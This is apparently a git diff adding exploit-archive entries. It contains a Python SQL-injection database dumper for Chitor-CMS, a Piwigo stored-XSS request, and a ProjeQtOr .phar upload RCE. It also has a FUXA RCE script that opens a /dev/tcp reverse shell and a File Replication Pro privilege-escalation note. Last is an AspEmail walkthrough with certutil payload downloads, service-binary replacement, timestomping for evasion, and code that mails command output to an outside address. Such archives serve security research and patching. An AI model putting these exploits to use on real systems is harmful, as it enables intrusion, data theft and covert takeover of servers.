+messagebus:x:105:111::/nonexistent:/usr/sbin/nologin +uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin +pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin +lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false +hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash +systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin +vboxadd:x:998:1::/var/run/vboxadd:/bin/false +openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false +sshd:x:110:65534::/run/sshd:/usr/sbin/nologin +mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false + + +### References: +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179 +https://nvd.nist.gov/vuln/detail/CVE-2023-27179 +https://www.exploit-db.com/papers/12883 \ No newline at end of file diff --git a/exploits/php/webapps/51383.py b/exploits/php/webapps/51383.py new file mode 100755 index 000000000..db85fcdfe --- /dev/null +++ b/exploits/php/webapps/51383.py @@ -0,0 +1,164 @@ +#!/usr/bin/python3 + +####################################################### +# # +# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection # +# Date: 2023/04/13 # +# ExploitAuthor: msd0pe # +# Project: https://github.com/waqaskanju/Chitor-CMS # +# My Github: https://github.com/msd0pe-1 # +# Patched the 2023/04/16: 69d3442 commit # +# # +####################################################### + +__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.' +__author__ = 'msd0pe' +__version__ = '1.1' +__date__ = '2023/04/13' + +class bcolors: + PURPLE = '\033[95m' + BLUE = '\033[94m' + GREEN = '\033[92m' + OCRA = '\033[93m' + RED = '\033[91m' + CYAN = '\033[96m' + ENDC = '\033[0m' + BOLD = '\033[1m' + UNDERLINE = '\033[4m' + +class infos: + INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] " + ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] " + GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] " + PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] " + +import re +import requests +import optparse +from prettytable import PrettyTable + +def DumpTable(url, database, table): + header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} + x = PrettyTable() + columns = [] + payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -" + u = requests.get(url + payload, headers=header) + try: + r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) + r = r[0].replace('\"',"").split(',') + if r == []: + pass + else: + for i in r: + columns.append(i) + pass + except: + pass + x.field_names = columns + payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -" + u = requests.get(url + payload, headers=header) + try: + r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) + r = r[0].replace('\"',"").split(',') + if r == []: + pass + else: + for i in r: + i = i.split("xzmdpl") + x.add_rows([i]) + except ValueError: + r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) + r = r[0].replace('\"',"").split(',') + if r == []: + pass + else: + for i in r: + i = i.split("xzmdpl") + i.append("") + x.add_rows([i]) + print(x) + +def ListTables(url, database): + header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} + x = PrettyTable() + x.field_names = ["TABLES"] + payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -" + u = requests.get(url + payload, headers=header) + try: + r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) + r = r[0].replace('\"',"").split(',') + if r == []: + pass + else: + for i in r: + x.add_row([i]) + except: + pass + print(x) + +def ListDatabases(url): + header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} + x = PrettyTable() + x.field_names = ["DATABASES"] + payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -" + u = requests.get(url + payload, headers=header) + try: + r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) + r = r[0].replace('\"',"").split(',') + if r == []: + pass + else: + for i in r: + x.add_row([i]) + except: + pass + print(x) + +def Main(): + Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__) + Menu.add_option('-u', '--url', type="str", dest="url", help='target url') + Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases') + Menu.add_option('-D', '--db', type="str", dest="database", help='select a database') + Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables') + Menu.add_option('-T', '--table', type="str", dest="table", help='select a table') + Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content') + (options, args) = Menu.parse_args() + + Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs + python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables + python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump + """) + Menu.add_option_group(Examples) + + if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}: + Menu.print_help() + print('') + print(' %s' % __description__) + print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC) + print(' Any malicious or illegal activity may be punishable by law') + print(' Use at your own risk') + + elif len(args) == 0: + try: + if options.url != None: + if options.l_databases != None: + ListDatabases(options.url) + if options.database != None: + if options.l_tables != None: + ListTables(options.url, options.database) + if options.table != None: + if options.dump != None: + DumpTable(options.url, options.database, options.table) + except: + print("Unexpected error") + +if __name__ == '__main__': + try: + Main() + + except KeyboardInterrupt: + print() + print(infos.PROCESS + "Exiting...") + print() + exit(1) \ No newline at end of file diff --git a/exploits/php/webapps/51386.txt b/exploits/php/webapps/51386.txt new file mode 100644 index 000000000..09b51e6cd --- /dev/null +++ b/exploits/php/webapps/51386.txt @@ -0,0 +1,43 @@ +Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS) +Application: Piwigo +Version: 13.6.0 +Bugs: Stored XSS +Technology: PHP +Vendor URL: https://piwigo.org/ +Software Link: https://piwigo.org/get-piwigo +Date of found: 18.04.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps: + +1.After uploading the image, we write instead of the tag(keyword) while editing the image) +payload: + + +POST /piwigo/admin.php?page=photo-9 HTTP/1.1 +Host: localhost +Content-Length: 159 +Cache-Control: max-age=0 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/piwigo/admin.php?page=photo-9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe +Connection: close + +name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings \ No newline at end of file diff --git a/exploits/php/webapps/51387.txt b/exploits/php/webapps/51387.txt new file mode 100644 index 000000000..5f78e3c3e --- /dev/null +++ b/exploits/php/webapps/51387.txt @@ -0,0 +1,89 @@ +Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE) +Application: ProjeQtOr Project Management System +Version: 10.3.2 +Bugs: Remote Code Execution (RCE) (Authenticated) via file upload +Technology: PHP +Vendor URL: https://www.projeqtor.org +Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download +Date of found: 19.04.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +Possible including php file with phar extension while uploading image. Rce is triggered when we visit again + +Payload: + +poc request: + + +POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1 +Host: localhost +Content-Length: 1177 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +Accept: application/json +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +sec-ch-ua-platform: "Linux" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/projeqtor/view/main.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic +Connection: close + +------WebKitFormBoundaryY0bpJaQzcvQberWR +Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar" +Content-Type: application/octet-stream + + + +------WebKitFormBoundaryY0bpJaQzcvQberWR +Content-Disposition: form-data; name="attachmentId" + + +------WebKitFormBoundaryY0bpJaQzcvQberWR +Content-Disposition: form-data; name="attachmentRefType" + +User +------WebKitFormBoundaryY0bpJaQzcvQberWR +Content-Disposition: form-data; name="attachmentRefId" + +1 +------WebKitFormBoundaryY0bpJaQzcvQberWR +Content-Disposition: form-data; name="attachmentType" + +file +------WebKitFormBoundaryY0bpJaQzcvQberWR +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +10485760 +------WebKitFormBoundaryY0bpJaQzcvQberWR +Content-Disposition: form-data; name="attachmentLink" + + +------WebKitFormBoundaryY0bpJaQzcvQberWR +Content-Disposition: form-data; name="attachmentDescription" + + +------WebKitFormBoundaryY0bpJaQzcvQberWR +Content-Disposition: form-data; name="attachmentPrivacy" + +1 +------WebKitFormBoundaryY0bpJaQzcvQberWR +Content-Disposition: form-data; name="uploadType" + +html5 +------WebKitFormBoundaryY0bpJaQzcvQberWR-- + + + + +visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar \ No newline at end of file diff --git a/exploits/typescript/webapps/51385.txt b/exploits/typescript/webapps/51385.txt new file mode 100644 index 000000000..7227c873f --- /dev/null +++ b/exploits/typescript/webapps/51385.txt @@ -0,0 +1,45 @@ +# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE) +# Date: 18/04/2023 +# Exploit Author: Rodolfo Mariano +# Vendor Homepage: https://github.com/frangoteam/FUXA +# Version: FUXA V.1.1.13-1186 (current) + +from argparse import RawTextHelpFormatter +import argparse, sys, threading, requests + +def main(rhost, rport, lhost, lport): + url = "http://"+rhost+":"+rport+"/api/runscript" + payload = { + "headers": + { + "normalizedNames":{}, + "lazyUpdate": "null" + }, + "params":{ + "script":{ + "parameters":[ + { + "name":"ok", + "type":"tagid", + "value":"" + } + ], + "mode":"", + "id":"", + "test":"true", + "name":"ok", + "outputId":"", + "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport) + } + } + } + response = requests.post(url, json=payload) +args = None +parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts --rport --lport ") +parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost') +parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881) +parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost') +parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport') + +args=parser.parse_args() +main(args.rhost, args.rport, args.lhost, args.lport) \ No newline at end of file diff --git a/exploits/windows/local/51375.txt b/exploits/windows/local/51375.txt new file mode 100644 index 000000000..7f94f36bb --- /dev/null +++ b/exploits/windows/local/51375.txt @@ -0,0 +1,38 @@ +# Exploit Title: File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control +# Date: 2023-04-13 +# Exploit Author: Andrea Intilangelo +# Vendor Homepage: http://www.diasoft.net - https://www.filereplicationpro.com +# Software Link: http://www.filereplicationpro.com/install/InstData/Windows_64_Bit/VM/frpro.exe +# Version: 7.5.0 +# Tested on: Windows 10 Pro 22H2 x64 +# CVE: CVE-2023-26918 + +Incorrect file/folder permissions in Diasoft Corporation's File Replication Pro 7.5.0 allow privilege escalation by +replacing a file with another one that will be executed with "LocalSystem" rights from Windows Services application. + +C:\Program Files>icacls "c:\Program Files\FileReplicationPro" +c:\Program Files\FileReplicationPro Everyone:(F) + Everyone:(OI)(CI)(IO)(F) + +C:\Users\Administrator>sc qc frp +[SC] QueryServiceConfig OPERAZIONI RIUSCITE + +NOME_SERVIZIO: frp + TIPO : 10 WIN32_OWN_PROCESS + TIPO_AVVIO : 2 AUTO_START + CONTROLLO_ERRORE : 1 NORMAL + NOME_PERCORSO_BINARIO : "C:\Program Files\FileReplicationPro\prunsrv.exe" //RS//frp + GRUPPO_ORDINE_CARICAMENTO : + TAG : 0 + NOME_VISUALIZZATO : FRPReplicationServer + DIPENDENZE : Tcpip + : Afd + SERVICE_START_NAME : LocalSystem + +To exploit the vulnerability a malicious actor/process must weaponize or replace the prunsrv.exe executable that runs +with LocalSystem privileges as "frp" (FRPReplicationServer) service, since the application's path has "Everyone" full +access permissions. + +Moreover, the "properties.xml" file in the "etc" folder inside program's path contains the hashed password for remote +access stored in sha1(base64) value, that is possible to modify. Replacing it with a new hash, generated by encrypting +a string in SHA-1 and encoding its digest via base64, will grant the login access on the application's web interface. \ No newline at end of file diff --git a/exploits/windows/local/51380.txt b/exploits/windows/local/51380.txt new file mode 100644 index 000000000..cf4bed842 --- /dev/null +++ b/exploits/windows/local/51380.txt @@ -0,0 +1,372 @@ +#################################################################################################################### +# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation # +# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] # +# Date: 13/04/2023 # +# Exploit Author: Zer0FauLT [admindeepsec@proton.me] # +# Vendor Homepage: https://www.aspemail.com # +# Software Link: https://www.aspemail.com/download.html # +# Product: AspEmail # +# Version: AspEmail 5.6.0.2 and all # +# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU # +# Tested on: Windows Server 2016 and Windows Server 2019 # +# CVE : 0DAY # +#################################################################################################################### + +# ================================================================================================================== + +[+] C:\PenTest>whoami /priv + + PRIVILEGES INFORMATION + ---------------------- + + Privilege Name Description State + ============================= ========================================= ======== + SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled + SeChangeNotifyPrivilege Bypass traverse checking Enabled + SeImpersonatePrivilege Impersonate a client after authentication Enabled + SeIncreaseWorkingSetPrivilege Increase a process working set Disabled + +# ================================================================================================================== + +* First, we will test whether the AspEmail service is active. +* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running: + +[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe + EmailAgent.exe 4400 Persits Software EmailAgent + + or + +[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe + EmailAgent64.exe 4400 Persits Software EmailAgent + +* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". +* Now we know that AspEmail service is active. + +# ================================================================================================================== + +* We will need these: + +[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit +[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe" +[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe" +[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat" +[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1" + +# ================================================================================================================== + +[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" + + Name: Persits Software EmailAgent + ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email + Agent.exe" /run + User : LocalSystem + ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN + IdentityReference : Everyone + Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, + AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, + ReadExtendedAttributes, DeleteChild, Execute/Traverse + Status : Unknown + UserCanStart : False + UserCanStop : False + +[+] C:\PenTest>del PrivescCheck.ps1 + +* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks. + +# ================================================================================================================== # + +[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail" + + Successfully processed 0 files; Failed processing 1 files + C:\Program Files (x86)\Persits Software\AspEmail: Access is denied. + +* We do not have permission to access subdirectories. + +# ================================================================================================================== + +[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" + + C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F) + DeepSecLab\psacln:(I)(OI)(CI)(N) + DeepSecLab\psaadm:(I)(OI)(CI)(N) + DeepSecLab\psaadm_users:(I)(OI)(CI)(N) + BUILTIN\Administrators:(I)(F) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX) + NT SERVICE\TrustedInstaller:(I)(CI)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(OI)(CI)(RX) + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX) + +* Unlike other directories, we have full privileges in the "BIN" directory of the service. +* This is chmod 0777 - rwxrwxrwx in linux language. + +# ================================================================================================================== + +[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID + + __PATH + + \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" + + \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544" + root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16 + [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators + +* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user. + +# ================================================================================================================== + +* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory. + +[+] C:\PenTest>whoami + DeepSecLab\Hacker + +[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN" + SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker". + +[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F + + processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN + Successfully processed 1 files; Failed processing 0 files + +* Ok. All commands resulted successfully. We now have full privileges for this directory. + +# ================================================================================================================== + +* Now we will modify the EmailAgent file and inject a self-written malware. +* We will be careful not to damage any files while doing this so that all transactions can be easily undone. + +[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe +[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe + +# ================================================================================================================== + +[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir + Volume in drive C has no label. + Volume Serial Number is 0C8A-5291 + + Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin + + 14.04.2023 16:47 . + 14.04.2023 16:47 .. + 01.03.2004 15:55 143.360 AspEmail.dll + 25.02.2004 16:23 188.416 AspUpload.dll + 13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe + 24.09.2003 09:22 139.264 EmailAgentCfg.cpl + 24.09.2003 09:25 94.208 EmailLogger.dll + 24.09.2003 09:21 167.936 Null.EmailAgent.exe + 6 File(s) 745.472 bytes + 2 Dir(s) 165.936.717.824 bytes free + +# ================================================================================================================== + +* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date. + +[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28" +[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe + +* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect. +* I used the Resource Tuner Console tool. +>>> http://www.restuner.com/tour-resource-tuner-console.htm +* This can be done easily with the Resource Tuner tool. +>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html +>>> http://www.restuner.com/download.htm + +# ================================================================================================================== + +[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir + Volume in drive C has no label. + Volume Serial Number is 0C8A-5291 + + Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin + + 14.04.2023 16:47 . + 14.04.2023 16:47 .. + 01.03.2004 15:55 143.360 AspEmail.dll + 25.02.2004 16:23 188.416 AspUpload.dll + 24.09.2003 09:21 12.288 EmailAgent.exe + 24.09.2003 09:22 139.264 EmailAgentCfg.cpl + 24.09.2003 09:25 94.208 EmailLogger.dll + 24.09.2003 09:21 167.936 Null.EmailAgent.exe + 6 File(s) 745.472 bytes + 2 Dir(s) 165.936.717.824 bytes free + + [24.09.2003 09:21] 12.288 EmailAgent.exe + [24.09.2003 09:21] 167.936 Null.EmailAgent.exe + +* And time manipulation is over. They look like they were uploaded at the same time long ago. + +# ================================================================================================================== + +* Now we check for my malware ownership. + +[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID + + __PATH + + \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" + + \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28 + +[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name + + Name + + DeepSecLab\Hacker + + EmailAgent.exe Owner: DeepSecLab\Hacker + +# =================================================================================================================# +# # +#################################################################################################################### +# #[EmailAgent.cs]# # +#################################################################################################################### +# # + # +* We program this malware in such a way that when the server is reboot(when the services are restarted), # +* It will be triggered and execute the codes we want, # +* And then send a printout of all this to the email address we specified. # + # + using System; # + using System.Linq; # + using System.Text; # + using System.Diagnostics; # + using System.IO; # + using System.Collections; # + # + Namespace CliToolSpace # + { # + class _Main # + { # + static void Main(string[] args) # + { # + Cli commandLine = new Cli(); # + commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); # + commandLine.Execute(); # + commandLine.ToFile(@"C:\Windows\Temp\"); # + } # + } # + } # + # +# # +#################################################################################################################### +# #[Mail.cs]# # +#################################################################################################################### +# # + # + using System; # + using System.Net.Mail; # + using System.Net; # + SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); # + var mail = new MailMessage(); # + mail.From = new MailAddress("mail@deepseclab.com"); # + mail.To.Add("mail@hacker.com"); # + mail.Subject = "Trigger Successful!"; # + mail.IsBodyHtml = true; # + string htmlBody; # + htmlBody = "This server has been rebooted."; # + mail.Body = htmlBody; # + Attachment attachment; # + attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); # + mail.Attachments.Add(attachment); # + SmtpServer.Port = 587; # + SmtpServer.UseDefaultCredentials = false; # + SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); # + SmtpServer.EnableSsl = true; # + SmtpServer.Timeout = int.MaxValue; # + SmtpServer.Send(mail); # + # +# # +#################################################################################################################### +# #[Run.bat]# # +#################################################################################################################### +# # + # + whoami > C:\Windows\Temp\Export.txt # + cd C:\Program Files (x86)\Persits Software\AspEmail\Bin # + del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe # + cd c:\Windows\Tasks # + del Run.bat & del Mail.exe # + # +# # +#################################################################################################################### +# # + [+]Trigger Successful![+] # + # +[+] C:\PenTest>systeminfo | findstr "Boot Time" # + System Boot Time: 13.04.2022, 07:46:06 # + # +# # +#################################################################################################################### + #[Export.txt]# # +#################################################################################################################### +# # + # + NT AUTHORITY\SYSTEM # + # +# # +#################################################################################################################### +# # +# ================================================================================================================== +# ...|||[FIX]|||... # +# ================================================================================================================== +# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] # +# =================================================================================================================# + +[+] C:\Administrator>sc qc "Persits Software EmailAgent" + [SC] QueryServiceConfig SUCCESS + + SERVICE_Name: Persits Software EmailAgent + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_Name : Persits Software EmailAgent + DEPENDENCIES : rpcss + SERVICE_START_Name : LocalSystem + +# ================================================================================================================== + +[+] C:\Administrator>sc sdshow "Persits Software EmailAgent" + + D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) + +# ================================================================================================================== + +[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula + + Accesschk v6.15 - Reports effective permissions for securable objects + Copyright (C) 2006-2022 Mark Russinovich + Sysinternals - www.sysinternals.com + + Persits Software EmailAgent + Medium Mandatory Level (Default) [No-Write-Up] + RW NT AUTHORITY\SYSTEM + SERVICE_ALL_ACCESS + RW BUILTIN\Administrators + SERVICE_ALL_ACCESS + +# ================================================================================================================== + +[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET + +[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" + + Successfully processed 0 files; Failed processing 1 files + C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied. + + DONE! + +# ================================================================================================================== + +[+] C:\Administrator>sc stop "Persits Software EmailAgent" + +[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent" + +* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore. + +# ================================================================================================================== \ No newline at end of file diff --git a/files_exploits.csv 